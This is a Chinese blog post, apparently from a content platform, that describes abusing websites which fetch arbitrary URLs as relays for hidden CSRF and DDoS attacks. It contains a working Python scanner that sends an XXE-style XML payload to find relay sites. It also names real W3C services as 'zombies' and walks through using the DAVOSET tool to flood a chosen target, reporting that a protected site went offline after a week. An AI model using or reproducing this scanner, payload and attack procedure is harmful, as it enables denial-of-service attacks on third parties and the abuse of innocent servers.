功能滥用漏洞研究




允许向其他网站(任意网页)发出请求的网站存在功能滥用漏洞,可用于对其他网站进行 CSRF 攻击

对于这些攻击,可以利用功能滥用漏洞(类似于本文中列出的漏洞)和远程文件包含漏洞(如 PHP 应用程序中的漏洞)——这就是通过 RFI 的功能滥用。

当需要对另一个站点进行隐藏的CSRF攻击(以免暴露)、进行DoS和DDoS攻击以及进行其他攻击,特别是执行不同的攻击时,可能需要这种攻击方法


这种攻击方法的优点。

这种利用外部站点攻击其他站点的方法具有以下优点(与使用自己的计算机相比):

使用其他服务器的资源。
隐藏引荐来源网址(与通过站点用户进行的 CSRF 攻击相比)。
隐藏自己的IP,除了隐藏攻击源外,还可以用来绕过IP限制。
利用外部站点的服务器对其他站点进行 DoS 攻击。
利用外部站点的服务器对其他站点进行DDoS攻击。
判断该漏洞的Poc

list.txt文件格式:

域名;域名路径

如果是
http://websecurity.com.ua/4322/
那么就是websecurity.com.ua;/4322/

贴代码

import socket
with open("list.txt", 'r', ) as file:
    content2 = file.read()
result = content2.split("\n")
for i in range(0, len(result)):
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    as1 = result[i].split(";")
    di = '{}'.format(i)
    print(di + "\n")
    server_address = (as1[0], 80)
    as1[0] = as1[0].encode()
    as1[1] = as1[1].encode()
    try:
        client_socket.connect(server_address)
        client_socket.sendall(b'POST / HTTP/1.1\n')
        client_socket.sendall(b'Host: ' + as1[0] + b' \n')
        client_socket.sendall(b'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n')
        client_socket.sendall(b'Accept: */*\n')
        with open('XML.txt', 'r') as file:
            content = file.read()
        body = len(content)
        if (type(body) is int):
            body = '{}'.format(body)
            body = body.encode()
        client_socket.sendall(b'Content-Length: ' + body + b'\n')
        client_socket.sendall(b'Content-Type: application/x-www-form-urlencoded\n')
        client_socket.sendall(b"Connection: close\n\n")
        content = content.encode()
        client_socket.sendall(content + b"\r\n\r\n")
        data = client_socket.recv(1024)
        as2 = data.decode().split("HTTP/1.1")
        as3 = as2[1].strip()
        data = as3[0:3]
        data = int(data)
        if data < 400:
            data = str(data)
            print("Ok" + data + "\n")
        else:
            data = str(data)
            print("NO" + data + "\n")
        client_socket.close()
    except Exception as e:
        result4 = str(e).split("\n")
        print(result4[len(result4) - 1] + "\n")
        continue




XML.txt内容
 

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ELEMENT methodName ANY>

<!ENTITY xxe SYSTEM "http://site" >]>

<methodCall>

<methodName>&xxe;</methodName>

</methodCall>



现在测试validator.w3.org/check?uri=和www.w3.org是否存在漏洞

编辑list.txt

输入validator.w3.org;/check?uri=

换行

输入
www.w3.org;/RDF/Validator/ARPServlet?URI=

运行结果


输出

Ok301

1

Ok301

都存在功能滥用

漏洞利用

打开DAVOSET 1.1.9工具(DAVOSET 官网 http://websecurity.com.ua/davoset/ )
先编辑list.txt

编辑格式

域名;请求方式;发送的文件

扫描出的都是XML请求,用XML.txt,所以是 域名;XML;XML.txt

将刚刚的两个僵尸输入list.txt

http://www.w3.org/;XML;XML.txt

http://validator.w3.org

运行davoset.pl


输入需要攻击的域名

攻击完成后,一般不重复攻击,只需要静静等待(僵尸需要先打死高防ip,才能打死服务器,时间较长)。

作者测试结果

目标:100GB高防

攻击后等待了一个星期后网站测速都无法访问

总结:虽然能进行DDoS攻击但是等待时间长,不适合攻击高防服务器

注:本文章直供学习

版权声明
本文仅代表作者观点,不代表平台立场。

本文系作者授权百家号发表,未经许可,不得转载。


联系我们:baijiahao@baidu.com

百家号独家出品
 

  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值